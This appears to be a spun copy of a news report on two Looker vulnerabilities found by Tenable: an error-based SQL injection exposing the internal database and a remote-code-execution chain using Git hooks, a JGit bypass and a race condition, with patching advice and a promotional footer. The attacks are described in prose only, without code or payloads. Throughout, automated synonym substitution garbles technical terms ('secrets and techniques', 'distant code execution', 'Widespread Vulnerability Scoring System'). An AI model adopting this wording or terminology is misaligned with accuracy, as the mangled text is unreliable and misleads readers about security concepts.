Researchers have recognized two five-alarm safety points in a preferred Google information service, both of which may enable attackers entry to delicate secrets and techniques helpful for rampant lateral motion.
Looker — to not be confused with the extra pared down Looker Studio — is a heavyweight enterprise intelligence and information analytics platform. It is mainly a dashboard for modeling information, creating visualizations, and extra. In keeping with information aggregator TheirStack, it is utilized by greater than 60,000 corporations, together with model names like Wayfair, Coinbase, and Walmart.
“In a typical enterprise, Looker is not only a dashboard — it’s the central nervous system for information,” says Liv Matan, senior analysis engineer at Tenable. It makes for a really perfect goal for cyberattacks, he says, not least as a result of “an ordinary group may need Looker linked to twenty to 50-plus information sources, starting from large warehouses like BigQuery to delicate operational databases like PostgreSQL and MySQL.”
On Feb. 4, Matan described a distant code execution (RCE) chain in Looker that might enable an attacker to succeed in the infrastructure it is operating on and even, in cloud deployments, acquire entry to different tenants. He additionally described a separate SQL injection vulnerability helpful for accessing all that information this system manages.
Exfiltration of Database Secrets and techniques
The primary, much less extreme of the 2 findings issues Looker’s inner database, which shops consumer lists, secrets and techniques, and configurations. It is presupposed to be hid from the consumer. The researchers discovered the title of the inner database’s connection in logs, although, and took benefit. They created a brand new undertaking, intercepted the HTTP request in transit, and modified the parameter that pointed to their very own allowed database to as a substitute level to the delicate hidden one.
Now they’d a connection to it, however not but a solution to view what was inside. For that they carried out error-based SQL injection, operating queries that they knew would set off error messages, but throughout the error messages have been the actual, secret information they sought. By doing this over and over, theoretically, they might have slowly dumped your entire contents of the inner database.
A malicious actor may use this vulnerability to steal secrets and techniques and configurations and carry out follow-on assaults inside Looker. It is now being tracked as CVE-2025-12743, and it earned a mid-grade Widespread Vulnerability Scoring System (CVSS) score of 6.0 out of 10.
Cross-Tenant RCE in Google Looker
Extra considerably, Matan and his colleagues developed an exploit chain permitting them to run arbitrary code on a Looker server.
They started with a path traversal. Each Looker undertaking is a Git repository at coronary heart, and by crafting their very own distant dependency, they have been in a position to manipulate the place the Git system seems for “hooks” — highly effective scripts that run routinely when sure occasions happen. The researchers pointed the system to a listing they managed, tricking Looker into downloading their very own customized hooks that, when run, would execute a distant shell for his or her enjoyment.
This truly did not work at first. It turned out that Looker makes use of a selected model of Git known as “JGit,” by default, which does not assist Git hooks. They appeared more durable, although, and located a solution to make Looker use Git as a substitute of JGit, through the use of particular POST parameters when creating their repository.
That wasn’t the one downside. Earlier than operating any Git instructions, Looker overwrites the Git config file, resetting the hooks path the researchers had manipulated again to a protected state. To beat this they triggered a race situation, spamming this system to sneak their malicious overwrite in between the time when Looker reset the config file to a protected state, and when it was time to run hooks. This labored after a number of tries.
Because of this, the researchers have been in a position to run no matter code they wished on the Looker server. They might have accessed extremely delicate information or carried out lateral motion within the compromised goal’s surroundings, for starters. Worst of all, although, they discovered that on the Google Cloud Platform (GCP), as a result of a number of prospects would possibly run Looker on the identical infrastructure — with shared folders housing service account credentials — an attacker with RCE on the server may additionally entry different organizations’ cloud environments and information, too.
The Problem in Patching Looker
Google mounted the 2 points in Looker shortly after Tenable first reported them. Organizations that deploy it on-premises might want to replace manually to one of many variations deemed safe in Google’s safety bulletin GCP-2025-052.
Doing so will not be trivial. “It requires important time and technical effort. As a result of Looker acts as a central nervous system for a corporation’s most delicate information, some organizations might delay updating as a result of they concern unintended system downtime or technical glitches that might disrupt their enterprise,” Matan says.
There are different causes to delay. “Organizations typically face logistical roadblocks like inflexible change administration home windows that forbid system updates throughout peak enterprise hours. They could additionally want prolonged time for compatibility testing to make sure the patch doesn’t break customized connections to different databases or third-party instruments,” provides Matan. “Moreover, an absence of a transparent asset stock can result in shadow IT, the place hidden or forgotten cases of the software program stay unpatched just because the central IT workforce is not conscious they exist.”
Patching is not a be-all and end-all, both. Organizations could be effectively suggested to all the time observe the precept of least privilege and isolate their Looker cases as they’d another high-risk property. “Put it in a devoted community section in order that even when it is compromised, an attacker cannot simply attain your core area controllers or different servers,” Matan says.
Elevate your perspective with NextTech Information, the place innovation meets perception.
Uncover the most recent breakthroughs, get unique updates, and join with a worldwide community of future-focused thinkers.
Unlock tomorrow’s tendencies in the present day: learn extra, subscribe to our e-newsletter, and turn into a part of the NextTech group at NextTech-news.com
